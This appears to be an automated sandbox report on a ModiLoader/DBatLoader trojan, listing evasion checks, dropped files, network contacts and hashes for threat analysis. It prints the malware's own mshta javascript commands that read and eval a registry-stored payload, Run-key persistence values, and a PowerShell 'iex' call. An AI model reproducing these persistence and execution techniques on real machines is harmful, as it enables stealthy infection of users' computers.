Malware Analysis Report

2024-08-06 14:18

Sample ID 240618-qxclxswbkg
Target bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118
SHA256 554d26bd54183554daa46c9140b63552c798a718ad189b07a71059378ef8e6d3
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

554d26bd54183554daa46c9140b63552c798a718ad189b07a71059378ef8e6d3

Threat Level: Known bad

The file bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Process spawned unexpected child process

Looks for VirtualBox drivers on disk

Looks for VirtualBox Guest Additions in registry

ModiLoader Second Stage

Checks for common network interception software

Looks for VMWare Tools registry key

Deletes itself

Drops startup file

Checks BIOS information in registry

Maps connected drives based on registry

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Modifies registry class

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-18 13:38

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-18 13:38

Reported

2024-06-18 13:40

Platform

win7-20240508-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\94d0f9.lnk C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\7358d4\\e5ae70.lnk\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:buD2lv=\"2D8\";bE4=new%20ActiveXObject(\"WScript.Shell\");x4dT7V=\"72x9F\";S7pIl=bE4.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\bfow\\\\niegp\");l73InS=\"TvQqu\";eval(S7pIl);P9hUG=\"DTvNyXD\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:bv60IBtG=\"NHl\";u50T=new%20ActiveXObject(\"WScript.Shell\");su8LZ=\"Umf854\";bz0YM=u50T.RegRead(\"HKCU\\\\software\\\\bfow\\\\niegp\");bbRQ5j4Lj=\"fqe\";eval(bz0YM);VI2o4nE=\"cF\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.1879f4f\ = "2070de" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open\command C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:SmB9cQkl=\"RkPC06\";V85m=new ActiveXObject(\"WScript.Shell\");b6FwBCi=\"m6oT8m\";dOq3l8=V85m.RegRead(\"HKCU\\\\software\\\\bfow\\\\niegp\");z8NQV6=\"GL9gEA\";eval(dOq3l8);dK7VN=\"tt7wJPX\";\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.1879f4f C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1668 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe
PID 1668 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe
PID 1668 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe
PID 1668 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe
PID 1668 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe
PID 1668 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe
PID 1668 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe
PID 1668 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe
PID 1668 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe
PID 2980 wrote to memory of 2700 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2980 wrote to memory of 2700 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2980 wrote to memory of 2700 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2980 wrote to memory of 2700 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 1700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 1700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 1700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 1700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 1700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 1700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 1700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 1700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1700 wrote to memory of 2280 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1700 wrote to memory of 2280 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1700 wrote to memory of 2280 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1700 wrote to memory of 2280 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1700 wrote to memory of 2280 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1700 wrote to memory of 2280 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1700 wrote to memory of 2280 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1700 wrote to memory of 2280 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe

C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:z4W1co="TCWo8bGx";RU2=new%20ActiveXObject("WScript.Shell");ao0GPq="9pubGCTM";Pxn6w6=RU2.RegRead("HKLM\\software\\Wow6432Node\\Ym0FcI67l\\bhvcXrcq");MaOW4EL4b="sk";eval(Pxn6w6);aA12yK="N";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:mgrdgdtr

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
US 38.215.236.157:80 tcp
US 91.236.237.182:8080 tcp
TR 88.240.252.189:80 tcp
GB 149.189.163.223:80 tcp
DE 46.89.208.5:80 tcp
AT 91.114.15.49:80 tcp
US 163.11.248.185:80 tcp
RU 90.188.202.92:80 tcp
IE 62.222.197.128:80 tcp
AU 16.176.74.61:80 tcp
US 160.254.227.78:80 tcp
PT 81.84.68.22:80 tcp
ES 37.13.6.142:80 tcp
US 141.128.179.88:80 tcp
FR 163.110.198.52:80 tcp
US 65.81.244.118:80 tcp
CN 223.157.44.146:80 tcp
US 204.120.42.79:8080 tcp
NO 148.121.1.130:80 tcp
BR 177.133.86.47:80 tcp
US 22.83.97.223:80 tcp
US 130.169.25.150:80 tcp
IT 83.158.159.164:80 tcp
US 44.107.85.196:80 tcp
US 98.55.232.191:80 tcp
SE 13.51.233.236:80 tcp
MX 200.23.134.10:80 tcp
US 55.94.48.215:80 tcp
US 146.7.221.183:80 tcp
US 137.3.136.228:80 tcp
US 165.156.233.122:80 tcp
US 75.78.139.121:80 tcp
US 11.44.140.81:80 tcp
IT 85.38.68.185:80 tcp
US 40.112.55.212:80 tcp
US 204.107.58.41:80 tcp
US 21.147.244.21:80 tcp
IN 106.77.226.59:80 tcp
US 206.139.86.134:80 tcp
KR 124.1.154.33:80 tcp
GB 51.239.102.79:80 tcp
US 75.203.91.202:80 tcp
US 70.122.210.164:80 tcp
BR 189.46.206.98:80 tcp
TW 140.132.159.140:443 tcp
EG 196.204.25.175:80 tcp
US 17.118.241.124:8080 tcp
MY 121.122.51.178:8080 tcp
JP 150.100.140.166:80 tcp
AR 186.63.45.214:80 tcp
US 205.44.77.231:8080 tcp
ID 180.254.15.214:80 tcp
BR 179.17.4.84:80 tcp
US 174.233.68.88:443 tcp
TR 95.10.129.84:80 tcp
RU 95.71.159.46:80 tcp
US 50.222.160.235:80 tcp
IE 57.203.52.170:80 tcp
SA 188.54.184.253:80 tcp
US 205.142.235.59:80 tcp
TW 110.31.172.11:80 tcp
FR 109.211.86.143:80 tcp
CN 124.204.176.95:80 tcp
KE 102.5.117.252:80 tcp
KW 62.215.56.82:80 tcp
BR 179.42.103.182:8080 tcp
US 134.12.72.95:80 tcp
CN 113.242.92.159:80 tcp
US 45.32.88.86:80 tcp
PH 115.85.35.247:80 tcp
US 74.107.52.118:80 tcp
ES 5.205.30.173:80 tcp
US 144.31.90.205:443 tcp
US 17.230.180.28:80 tcp
CO 190.242.45.3:80 tcp
KR 175.203.187.166:80 tcp
MX 189.187.157.12:80 tcp
US 13.144.122.139:80 tcp
CA 142.153.97.211:80 tcp
US 205.23.202.104:443 tcp
IN 171.55.141.76:80 tcp
US 97.199.142.39:80 tcp
GB 86.184.108.134:80 tcp
US 129.5.25.38:80 tcp
US 70.243.31.58:80 tcp
JP 160.185.78.32:443 tcp
JP 126.243.43.198:80 tcp
JP 133.237.160.3:443 tcp
US 138.150.80.138:80 tcp
IL 147.236.199.193:80 tcp
US 15.112.84.82:80 tcp
JP 219.31.45.233:80 tcp
CL 181.173.92.75:80 tcp
US 131.65.240.246:80 tcp
FR 52.47.243.68:80 tcp
NO 37.191.200.36:80 tcp
NZ 122.56.198.203:80 tcp
CL 191.114.19.150:80 tcp
CN 120.235.208.1:80 tcp
FR 78.121.40.82:80 tcp
CA 173.210.133.89:443 tcp
US 104.43.209.244:80 tcp
US 162.209.64.106:80 tcp
SE 37.72.190.76:80 tcp
US 76.10.36.221:80 tcp
SA 128.127.199.254:80 tcp
DK 185.57.11.80:80 tcp
KR 119.204.154.90:443 tcp
US 108.115.155.241:80 tcp
IN 101.210.73.235:80 tcp
US 50.10.2.231:80 tcp
IR 37.32.1.237:80 tcp
US 55.187.81.69:8080 tcp
FR 132.169.80.3:80 tcp
US 13.88.9.7:80 tcp
NL 193.47.61.119:80 tcp
GB 109.249.170.83:80 tcp
US 205.65.48.5:80 tcp
US 4.156.200.142:80 tcp
IN 129.227.253.89:80 tcp
US 55.183.152.169:80 tcp
US 208.14.155.58:80 tcp
RE 92.130.201.232:80 tcp
MY 118.100.50.148:80 tcp
US 104.26.111.71:80 tcp
NA 41.182.221.22:80 tcp
BA 91.191.27.171:80 tcp
CA 104.246.172.128:8080 tcp
US 68.40.249.243:80 tcp
KE 105.31.176.77:80 tcp
JP 61.21.88.243:80 tcp
US 35.142.126.195:80 tcp
ID 114.13.240.152:80 tcp
US 44.173.17.56:80 tcp
KR 121.144.16.214:80 tcp
DK 62.243.219.68:80 tcp
US 20.221.247.217:80 tcp
US 52.22.101.223:80 tcp

Files

memory/1996-0-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1996-12-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1996-10-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1996-8-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1996-6-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1996-4-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1996-2-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1996-13-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1996-14-0x0000000001D20000-0x0000000001DF6000-memory.dmp

memory/1996-18-0x0000000001D20000-0x0000000001DF6000-memory.dmp

memory/1996-17-0x0000000001D20000-0x0000000001DF6000-memory.dmp

memory/1996-16-0x0000000001D20000-0x0000000001DF6000-memory.dmp

memory/1996-15-0x0000000001D20000-0x0000000001DF6000-memory.dmp

memory/1996-19-0x0000000001D20000-0x0000000001DF6000-memory.dmp

memory/1996-20-0x0000000001D20000-0x0000000001DF6000-memory.dmp

memory/2700-29-0x0000000006240000-0x0000000006316000-memory.dmp

memory/1700-31-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-33-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2700-34-0x0000000006240000-0x0000000006316000-memory.dmp

memory/1700-35-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-36-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-37-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-38-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-39-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-48-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-50-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-51-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-49-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-54-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-55-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-66-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-74-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-68-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-67-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-65-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-64-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-62-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-57-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-56-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-53-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-52-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-47-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-46-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-45-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-44-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-43-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-42-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2280-80-0x0000000000120000-0x0000000000261000-memory.dmp

memory/2280-79-0x0000000000120000-0x0000000000261000-memory.dmp

memory/2280-78-0x0000000000120000-0x0000000000261000-memory.dmp

memory/2280-77-0x0000000000120000-0x0000000000261000-memory.dmp

memory/2280-76-0x0000000000120000-0x0000000000261000-memory.dmp

memory/2280-75-0x0000000000120000-0x0000000000261000-memory.dmp

memory/1700-41-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1700-40-0x0000000000110000-0x0000000000251000-memory.dmp

C:\Users\Admin\AppData\Local\7358d4\6d45a7.bat

MD5 14adc766d85da95cd0990ed6bcc1524d
SHA1 e3c8f83a8fbfea658c9139d3e670d609745fb848
SHA256 0245cf83462c2d8f2453beb1094af0133caee498c1ab5147ee361cb8a449c1c4
SHA512 b4172624d668b6c1e7519cca9cbb53645ecc8b9aa1e4908801fd81983b092ed7ad26e3e29047ff5dc4e7744ee9f08dc61765133fa5957926cb4518127f4b60b8

C:\Users\Admin\AppData\Local\7358d4\2d9c5e.1879f4f

MD5 0fc2a90f922c7db831dbb7402df71895
SHA1 f91ed2d384fb731802b4672483756f7004242ce2
SHA256 7276b58c89a6af95faf49fefa0d8f76674e91655458d6b9a2e94df131934b8b1
SHA512 fe92f1249ead9e450469f744116d20e1cd1890772be573fab29a2c444d99a4ae14f11522e65ac6b52fc7ad6fb701e00292edf87551e9a689c9b7b0ab8104991d

C:\Users\Admin\AppData\Local\7358d4\e5ae70.lnk

MD5 2eac216aea6212a07422630515788145
SHA1 af0be2710a0f33168bda02803489c5c1ee3e9390
SHA256 46fb8c191f050e10f26155bed6ec064326910b70f2053ced1be78850309d8297
SHA512 511e179534b2ff3f38973d0f5938c00bf2315edb19c9cb5135f8083af03c4acb4dbae2cd5cdcb00f0e13d3919b85362792490e6840ee672c0462cbd5226b9e93

C:\Users\Admin\AppData\Roaming\e53183\8858ab.1879f4f

MD5 62d3627c14ebc28756d835aa645330d2
SHA1 950cd1c4bff3e67eda5a0e8aee57caa17216453f
SHA256 173bb4100fda04cbc9600f6d0e265ee61f569792dd3a735454251982fd9c0491
SHA512 5cb606db9b746dae2199d56277710eee963a27c65765706739433ef1936a416fd3de07c57059bc34e7dd235975c31db8a288a1add4bf3f46e9c18a631526e2c1

